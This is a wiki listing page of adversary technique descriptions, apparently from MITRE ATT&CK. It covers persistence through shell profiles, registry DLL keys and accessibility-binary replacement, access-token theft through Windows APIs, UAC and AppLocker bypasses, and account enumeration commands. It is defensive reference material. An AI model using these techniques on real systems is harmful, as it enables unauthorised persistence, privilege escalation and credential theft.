Property:Has technical description

From enterprise
Jump to: navigation, search

This is a property of type Text.

Pages using the property "Has technical description"

Showing 25 pages using this property.

View (previous 25 | next 25) (20 | 50 | 100 | 250 | 500)

.bash_profile and .bashrc +<code>~/.bash_profile</code> and <code>~/.bashrc</code> are executed in a user's context when a new shell opens or when a user logs in so that their environment is set correctly. <code>~/.bash_profile</code> is executed for login shells and <code>~/.bashrc</code> is executed for interactive non-login shells. This means that when a user logs in (via username and password) to the console (either locally or remotely via something like SSH), <code>~/.bash_profile</code> is executed before the initial command prompt is returned to the user. After that, every time a new shell is opened, <code>~/.bashrc</code> is executed. This allows users more fine grained control over when they want certain commands executed. Mac's Terminal.app is a little different in that it runs a login shell by default each time a new terminal window is opened, thus calling <code>~/.bash_profile</code> each time instead of <code>~/.bashrc</code>. These files are meant to be written to by the local user to configure their own environment; however, adversaries can also insert code into these files to gain persistence each time a user logs in or opens a new shell [[CiteRef::amnesia malware]].  +
Access Token Manipulation +Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token. For example, Microsoft promotes the use of access tokens as a security best practice. Administrators should log in as a standard user but run their tools with administrator privileges using the built-in access token manipulation command <code>runas</code>. [[CiteRef::Microsoft runas]] Adversaries may use access tokens to operate under a different user or system security context to perform actions and evade detection. An adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system.[[CiteRef::Pentestlab Token Manipulation]] Access tokens can be leveraged by adversaries through three methods:[[CiteRef::BlackHat Atkinson Winchester Token Manipulation]] '''Token Impersonation/Theft''' - An adversary creates a new access token that duplicates an existing token using <code>DuplicateToken(Ex)</code>. The token can then be used with <code>ImpersonateLoggedOnUser</code> to allow the calling thread to impersonate a logged on user's security context, or with <code>SetThreadToken</code> to assign the impersonated token to a thread. This is useful for when the target user has a non-network logon session on the system. '''Create Process with a Token''' - An adversary creates a new access token with <code>DuplicateToken(Ex)</code> and uses it with <code>CreateProcessWithTokenW</code> to create a new process running under the security context of the impersonated user. This is useful for creating a new process under the security context of a different user. '''Make and Impersonate Token''' - An adversary has a username and password but the user is not logged onto the system. The adversary can then create a logon session for the user using the <code>LogonUser</code> function. The function will return a copy of the new session's access token and the adversary can use <code>SetThreadToken</code> to assign the token to a thread. Any standard user can use the <code>runas</code> command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account. Metasploit’s Meterpreter payload allows arbitrary token manipulation and uses token impersonation to escalate privileges. [[CiteRef::Metasploit access token]] The Cobalt Strike beacon payload allows arbitrary token impersonation and can also create tokens. [[CiteRef::Cobalt Strike Access Token]]  +
Accessibility Features +Windows contains accessibility features that may be launched with a key combination before a user has logged in (for example, when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system. Two common accessibility programs are <code>C:\Windows\System32\sethc.exe</code>, launched when the shift key is pressed five times and <code>C:\Windows\System32\utilman.exe</code>, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as "sticky keys", and has been used by adversaries for unauthenticated access through a remote desktop login screen.[[CiteRef::FireEye Hikit Rootkit]] Depending on the version of Windows, an adversary may take advantage of these features in different ways because of code integrity enhancements. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in <code>%systemdir%\</code>, and it must be protected by Windows File or Resource Protection (WFP/WRP).[[CiteRef::DEFCON2016 Sticky Keys]] The debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced. Examples for both methods: For simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., <code>C:\Windows\System32\utilman.exe</code>) may be replaced with "cmd.exe" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [[Technique/T1076|Remote Desktop Protocol]] will cause the replaced file to be executed with SYSTEM privileges.[[CiteRef::Tilbury 2014]] For the debugger method on Windows Vista and later as well as Windows Server 2008 and later, for example, a Registry key may be modified that configures "cmd.exe," or another program that provides backdoor access, as a "debugger" for the accessibility program (e.g., "utilman.exe"). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with RDP will cause the "debugger" program to be executed with SYSTEM privileges.[[CiteRef::Tilbury 2014]] Other accessibility features exist that may also be leveraged in a similar fashion:[[CiteRef::DEFCON2016 Sticky Keys]] *On-Screen Keyboard: <code>C:\Windows\System32\osk.exe</code> *Magnifier: <code>C:\Windows\System32\Magnify.exe</code> *Narrator: <code>C:\Windows\System32\Narrator.exe</code> *Display Switcher: <code>C:\Windows\System32\DisplaySwitch.exe</code> *App Switcher: <code>C:\Windows\System32\AtBroker.exe</code>  +
Account Discovery +Adversaries may attempt to get a listing of local system or domain accounts. ===Windows=== Example commands that can acquire this information are <code>net user</code>, <code>net group <groupname></code>, and <code>net localgroup <groupname></code> using the [[Software/S0039|Net]] utility or through use of [[Software/S0105|dsquery]]. If adversaries attempt to identify the primary user, currently logged in user, or set of users that commonly uses a system, [[Technique/T1033|System Owner/User Discovery]] may apply. ===Mac=== On Mac, groups can be enumerated through the <code>groups</code> and <code>id</code> commands. In mac specifically, <code>dscl . list /Groups</code> and <code>dscacheutil -q group</code> can also be used to enumerate groups and users. ===Linux=== On Linux, local users can be enumerated through the use of the <code>/etc/passwd</code> file which is world readable. In mac, this same file is only used in single-user mode in addition to the <code>/etc/master.passwd</code> file. Also, groups can be enumerated through the <code>groups</code> and <code>id</code> commands. In mac specifically, <code>dscl . list /Groups</code> and <code>dscacheutil -q group</code> can also be used to enumerate groups and users.  +
Account Manipulation +Account manipulation may aid adversaries in maintaining access to credentials and certain permission levels within an environment. Manipulation could consist of modifying permissions, modifying credentials, adding or changing permission groups, modifying account settings, or modifying how authentication is performed. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain.  +
AppCert DLLs +Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key <code>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager</code> are loaded into every process that calls the ubiquitously used application programming interface (API) functions:[[CiteRef::Engame Process Injection July 2017]] *CreateProcess *CreateProcessAsUser *CreateProcessWithLoginW *CreateProcessWithTokenW *WinExec Similar to [[Technique/T1055|Process Injection]], this value can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer.  +
AppInit DLLs +Dynamic-link libraries (DLLs) that are specified in the AppInit_DLLs value in the Registry keys <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows</code> or <code>HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows</code> are loaded by user32.dll into every process that loads user32.dll. In practice this is nearly every program, since user32.dll is a very common library.[[CiteRef::Engame Process Injection July 2017]] Similar to [[Technique/T1055|Process Injection]], these values can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer.[[CiteRef::AppInit Registry]] The AppInit DLL functionality is disabled in Windows 8 and later versions when secure boot is enabled.[[CiteRef::AppInit Secure Boot]]  +
AppleScript +macOS and OS X applications send AppleEvent messages to each other for interprocess communications (IPC). These messages can be easily scripted with AppleScript for local or remote IPC. Osascript executes AppleScript and any other Open Scripting Architecture (OSA) language scripts. A list of OSA languages installed on a system can be found by using the <code>osalang</code> program. AppleEvent messages can be sent independently or as part of a script. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely. Adversaries can use this to interact with open SSH connection, move to remote machines, and even present users with fake dialog boxes. These events cannot start applications remotely (they can start them locally though), but can interact with applications if they're already running remotely. Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via python [[CiteRef::Macro Malware Targets Macs]]. Scripts can be run from the command lie via <code>osascript /path/to/script</code> or <code>osascript -e "script here"</code>.  +
Application Deployment Software +Adversaries may deploy malicious software to systems within a network using application deployment systems employed by enterprise administrators. The permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the deployment server, or specific domain credentials may be required. However, the system may require an administrative account to log in or to perform software deployment. Access to a network-wide or enterprise-wide software deployment system enables an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.  +
Application Shimming +The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.[[CiteRef::Engame Process Injection July 2017]] Within the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses [[Technique/T1179|Hooking]] to redirect the code as necessary in order to communicate with the OS. A list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in: * <code>%WINDIR%\AppPatch\sysmain.sdb</code> * <code>hklm\software\microsoft\windows nt\currentversion\appcompatflags\installedsdb</code> Custom databases are stored in: * <code>%WINDIR%\AppPatch\custom & %WINDIR%\AppPatch\AppPatch64\Custom</code> * <code>hklm\software\microsoft\windows nt\currentversion\appcompatflags\custom</code> To keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to [[Technique/T1088|Bypass User Account Control]] (UAC) (RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress). Similar to [[Technique/T1179|Hooking]], utilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc.  +
Application Window Discovery +Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger. In Mac, this can be done natively with a small [[Technique/T1155|AppleScript]] script.  +
Audio Capture +An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information. Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later.  +
Authentication Package +Windows Authentication Package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.[[CiteRef::MSDN Authentication Packages]] Adversaries can use the autostart mechanism provided by LSA Authentication Packages for persistence by placing a reference to a binary in the Windows Registry location <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\</code> with the key value of <code>"Authentication Packages"=<target binary></code>. The binary will then be executed by the system when the authentication packages are loaded.  +
Automated Collection +Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of [[Technique/T1064|Scripting]] to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. This functionality could also be built into remote access tools. This technique may incorporate use of other techniques such as [[Technique/T1083|File and Directory Discovery]] and [[Technique/T1105|Remote File Copy]] to identify and move files.  +
Automated Exfiltration +Data, such as sensitive documents, may be exfiltrated through the use of automated processing or [[Technique/T1064|Scripting]] after being gathered during [[Collection]]. When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [[Technique/T1041|Exfiltration Over Command and Control Channel]] and [[Technique/T1048|Exfiltration Over Alternative Protocol]].  +
BITS Jobs +Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through Component Object Model (COM)[[CiteRef::Microsoft COM]].[[CiteRef::Microsoft BITS]] BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations. The interface to create and manage BITS jobs is accessible through [[Technique/T1086|PowerShell]] [[CiteRef::Microsoft BITS]] and the [[Software/S0190|BITSAdmin]] tool.[[CiteRef::Microsoft BITSAdmin]] Adversaries may abuse BITS to download, execute, and even clean up after malicious code. BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.[[CiteRef::CTU BITS Malware June 2016]][[CiteRef::Mondok Windows PiggyBack BITS May 2007]][[CiteRef::Symantec BITS May 2007]] BITS enabled execution may also allow [[Persistence]] by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).[[CiteRef::PaloAlto UBoatRAT Nov 2017]][[CiteRef::CTU BITS Malware June 2016]] BITS upload functionalities can also be used to perform [[Technique/T1048|Exfiltration Over Alternative Protocol]].[[CiteRef::CTU BITS Malware June 2016]]  +
Bash History +Bash keeps track of the commands users type on the command-line with the "history" utility. Once a user logs out, the history is flushed to the user’s <code>.bash_history</code> file. For each user, this file resides at the same location: <code>~/.bash_history</code>. Typically, this file keeps track of the user’s last 500 commands. Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out. Attackers can abuse this by looking through the file for potential credentials.[[CiteRef::External to DA, the OS X Way]]  +
Binary Padding +Some security tools inspect files with static signatures to determine if they are known malicious. Adversaries may add data to files to increase the size beyond what security tools are capable of handling or to change the file hash to avoid hash-based blacklists.  +
Bootkit +A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR).[[CiteRef::MTrends 2016]] Adversaries may use bootkits to persist on systems at a layer below the operating system, which may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly. ===Master Boot Record=== The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code.[[CiteRef::Lau 2011]] ===Volume Boot Record=== The MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.  +
Browser Bookmark Discovery +Adversaries may enumerate browser bookmarks to learn more about compromised hosts. Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure. Browser bookmarks may also highlight additional targets after an adversary has access to valid credentials, especially [[Technique/T1081|Credentials in Files]] associated with logins cached by a browser. Specific storage locations vary based on platform and/or application, but browser bookmarks are typically stored in local files/databases.  +
Browser Extensions +Browser extensions or plugins are small programs that can add functionality and customize aspects of internet browsers. They can be installed directly or through a browser's app store. Extensions generally have access and permissions to everything that the browser can access.[[CiteRef::Wikipedia Browser Extension]][[CiteRef::Chrome Extensions Definition]] Malicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores so may not be difficult for malicious extensions to defeat automated scanners and be uploaded.[[CiteRef::Malicious Chrome Extension Numbers]] Once the extension is installed, it can browse to websites in the background,[[CiteRef::Chrome Extension Crypto Miner]][[CiteRef::ICEBRG Chrome Extensions]] steal all information that a user enters into a browser, to include credentials,[[CiteRef::Banker Google Chrome Extension Steals Creds]][[CiteRef::Catch All Chrome Extension]] and be used as an installer for a RAT for [[persistence]]. There have been instances of botnets using a persistent backdoor through malicious Chrome extensions.[[CiteRef::Stantinko Botnet]] There have also been similar examples of extensions being used for command & control [[CiteRef::Chrome Extension C2 Malware]].  +
Brute Force +Adversaries may use brute force techniques to attempt access to accounts when passwords are unknown or when password hashes are obtained. [[Technique/T1003|Credential Dumping]] to obtain password hashes may only get an adversary so far when [[Technique/T1075|Pass the Hash]] is not an option. Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table. Cracking hashes is usually done on adversary-controlled systems outside of the target network.[[CiteRef::Wikipedia Password cracking]] Adversaries may attempt to brute force logins without knowledge of passwords or hashes during an operation either with zero knowledge or by attempting a list of known or possible passwords. This is a riskier option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies.[[CiteRef::Cylance Cleaver]] A related technique called password spraying uses one password, or a small list of passwords, that matches the complexity policy of the domain and may be a commonly used password. Logins are attempted with that password and many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords.[[CiteRef::BlackHillsInfosec Password Spraying]]  +
Bypass User Account Control +Windows User Account Control (UAC) allows a program to elevate its privileges to perform a task under administrator-level permissions by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.[[CiteRef::TechNet How UAC Works]] If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs are allowed to elevate privileges or execute some elevated COM objects without prompting the user through the UAC notification box.[[CiteRef::TechNet Inside UAC]][[CiteRef::MSDN COM Elevation]] An example of this is use of rundll32.exe to load a specifically crafted DLL which loads an auto-elevated COM object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.[[CiteRef::Davidson Windows]] Adversaries can use these techniques to elevate privileges to administrator if the target process is unprotected. Many methods have been discovered to bypass UAC. The Github readme page for UACMe contains an extensive list of methods[[CiteRef::Github UACMe]] that have been discovered and implemented within UACMe, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as: * <code>eventvwr.exe</code> can auto-elevate and execute a specified binary or script.[[CiteRef::enigma0x3 Fileless UAC Bypass]][[CiteRef::Fortinet Fareit]] Another bypass is possible through some [[Lateral Movement]] techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on lateral systems and default to high integrity.[[CiteRef::SANS UAC Bypass]]  +
CMSTP +The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles.[[CiteRef::Microsoft Connection Manager Oct 2009]] CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections. Adversaries may supply CMSTP.exe with INF files infected with malicious commands.[[CiteRef::Twitter CMSTP Usage Jan 2018]] Similar to [[Technique/T1117|Regsvr32]] / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs[[CiteRef::MSitPros CMSTP Aug 2017]] and/or COM scriptlets (SCT) from remote servers.[[CiteRef::Twitter CMSTP Jan 2018]][[CiteRef::GitHub Ultimate AppLocker Bypass List]] This execution may also bypass AppLocker and other whitelisting defenses since CMSTP.exe is a legitimate, signed Microsoft application. CMSTP.exe can also be abused to [[Technique/T1088|Bypass User Account Control]] and execute arbitrary commands from a malicious INF through an auto-elevated COM interface.[[CiteRef::MSitPros CMSTP Aug 2017]][[CiteRef::GitHub Ultimate AppLocker Bypass List]]  +
Change Default File Association +When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access.[[CiteRef::Microsoft Change Default Programs]][[CiteRef::Microsoft File Handlers]] Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened. System file associations are listed under <code>HKEY_CLASSES_ROOT\.[extension]</code>, for example <code>HKEY_CLASSES_ROOT\.txt</code>. The entries point to a handler for that extension located at <code>HKEY_CLASSES_ROOT\[handler]</code>. The various commands are then listed as subkeys underneath the shell key at <code>HKEY_CLASSES_ROOT\[handler]\shell\[action]\command</code>. For example: *<code>HKEY_CLASSES_ROOT\txtfile\shell\open\command</code> *<code>HKEY_CLASSES_ROOT\txtfile\shell\print\command</code> *<code>HKEY_CLASSES_ROOT\txtfile\shell\printto\command</code> The values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to execute arbitrary commands.  +